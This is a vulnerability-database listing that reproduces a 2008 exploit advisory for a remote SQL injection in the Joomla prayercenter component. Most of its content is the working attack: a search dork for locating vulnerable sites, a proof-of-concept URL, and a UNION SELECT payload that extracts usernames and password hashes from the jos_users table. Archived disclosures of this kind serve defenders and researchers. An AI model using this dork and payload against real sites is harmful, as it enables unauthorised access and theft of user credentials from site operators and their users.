Lucene search

K

joomlaprayer-sql.txt

🗓️ 31 May 2008 00:00:00Reported by His0k4Type 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 12 Views

Joomla Component prayercenter Remote SQL injection vulnerability exploit details and example provided.

Show more
Code
`/---------------------------------------------------------------\  
\ /  
/ Joomla Component prayercenter Remote SQL injection \  
\ /  
\---------------------------------------------------------------/  
  
  
[*] Author : His0k4 [ALGERIAN HaCkEr]  
  
[*] Dork : inurl:"com_prayercenter"  
  
[*] POC : http://localhost/[Joomla_Path]/index2.php?option=com_prayercenter&task=view_request&id={SQL}  
  
[*] Example : http://localhost/[Joomla_Path]/index2.php?option=com_prayercenter&task=view_request&id=-1 UNION SELECT user(),user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user(),user(),user(),user(),user() FROM jos_users--  
  
[*] Note : Sometimes you need to register for doing this exploit  
  
----------------------------------------------------------------------------  
[*] Greetings : Str0ke, all friends & muslims HaCkeRs...  
[*] Greetings2 : http://www.palcastle.org/cc  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
31 May 2008 00:00Current
7.4High risk
Vulners AI Score7.4
12
.json
Report